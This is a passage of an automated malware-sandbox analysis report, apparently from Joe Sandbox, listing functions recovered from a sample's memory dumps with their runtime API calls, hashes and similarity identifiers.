                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAF03C36A50304EFDB14EF78DC45B5D7BB0EB08714F10516AF914DF2A0CB7499548B8A
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(Function_000170AB,00000001,00438F98,0000000C), ref: 00417129
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                              • Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                                                                                              • Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 03170449
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                              • Instruction ID: a88acf016352d585060b328abc67a9a6808031f464af418180b3d5d274505e3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44F0553A30031557CB08EF3ADC0577ABFA8EFC9714B4A409EEE0A8B240C7729842C790
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 004201E2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                              • Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00409C12,031595DF), ref: 03159E72
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                              • Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                              • Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                              • Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                              • Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                              • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                              • Instruction ID: 25c077257de7c9d719600d2131ba124d950fe9782468e3d3375a5f5ff1def40a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF515765600749D7DB38CB788598BBFA79A9F0E200F5C091AFDB2CF295C705E9878352
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                              • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                              • Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                              • Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
                                                                                                                                                                                                                              • Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
                                                                                                                                                                                                                              • Instruction ID: d4ebaa65498674ec5fd033f868b33b9562cf8a9fc909dcd3fe82be6bf65502bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F321332E69F014DD7239634CC62376A259AFB73C4F55D737E81AB5AA5EB28C4C34108
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction ID: e45592b676ab25333cd61dceb0c1cce5cadf9a8d66ea78a6e2826f0208d371ce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B9135722092A28BDB2DCB7A857447EFEE15A453A170E179EF8F3CA1C1EF14C154D6A0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction ID: 5975a2af078c28816f01fe1301a8b7dceccd13c1e98c5dc0dc8573345ea9f6ce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 219186722180A38AD72D437984B403FFFE15A513A131A07BFD4F2DA6C1EE38C555A628
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction ID: 71d193257b6c40191d5e784b73a73b00b144a0897522cfb48bfe6dc32a972344
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 319173761092A38BDB29CB3E857403DFFE15A463A170E079EF8F2CA1C1EF148154D6A0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction ID: 21e6ce72fb18376f8c9c0177a15a08f5feb8af2f21d081aaa92a013857dedb9e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F9179761080A38ADB29473985B403FFFE15A523A131A0BBFD4F2DB2C5EE38D555E624
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction ID: d28fe8928e5e2cdb403f3b30dfbcba5a9a60953aec65370b2bffc76b76a26741
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 029145721092A3CBDB6D8B7E94B403DFEE15A593A170E079DF8F3CA1D1EF14815496A0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction ID: 69778eac300dd1c10c594cbe57f4f6eadb7335fd5fb69c830af9f3d407440417
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F9158722080A389D729477D897447FFFE19A513A131A07BFD4F2DB2C1EE388554DA68
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction ID: 1d29946cea012790a461047da0148e36e24f40734e5a3d1ac2a295d5d80df8cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D81417720D1A38BDB2DCB7A857403EFFE55A462A170E479EF8F2CA1C1EF2481549660
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction ID: 2607aabaea6df519b2dd372ead2d1238015a119bad60f1980fa744d4abdc4045
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D38186722080A34AEB294639847447FFFE1DE513A131A07BFD4F2DA2C1EF38855596AC
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F67000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2f67000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                              • Instruction ID: edb88f2368ddfd72bbcaf34dff01b6499f2ab79ebee913e77830779b783b38c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE1182723401019FD744DF59DC84FA6B3EAEB89264B198165EE04CB316D676E841CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                              • Instruction ID: 0d11079192f3a73462b098d4975cc356ad881efe34aaec6745bc2976de329111
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B201A776A00604CFDF21CFA4CC14BAA73E9EB8D315F5944E5ED1697241E774A9418F90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                                                              • Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
                                                                                                                                                                                                                              • Instruction ID: 205780c084bb2497aed94199218cba20536fa9be7fade5fa8444e2e52dca11da
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACB18E719003059FDB21DFA9C880BEEBBF5BF0C304F18446DE995AB241DB76A852CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                                                              • Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
                                                                                                                                                                                                                              • Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 0316F7CC
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB38
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB4A
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB5C
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB6E
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB80
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB92
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBA4
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBB6
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBC8
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBDA
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBEC
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBFE
                                                                                                                                                                                                                                • Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EC10
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F7C1
                                                                                                                                                                                                                                • Part of subcall function 03166501: HeapFree.KERNEL32(00000000,00000000,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?), ref: 03166517
                                                                                                                                                                                                                                • Part of subcall function 03166501: GetLastError.KERNEL32(?,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?,?), ref: 03166529
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F7E3
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F7F8
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F803
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F825
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F838
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F846
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F851
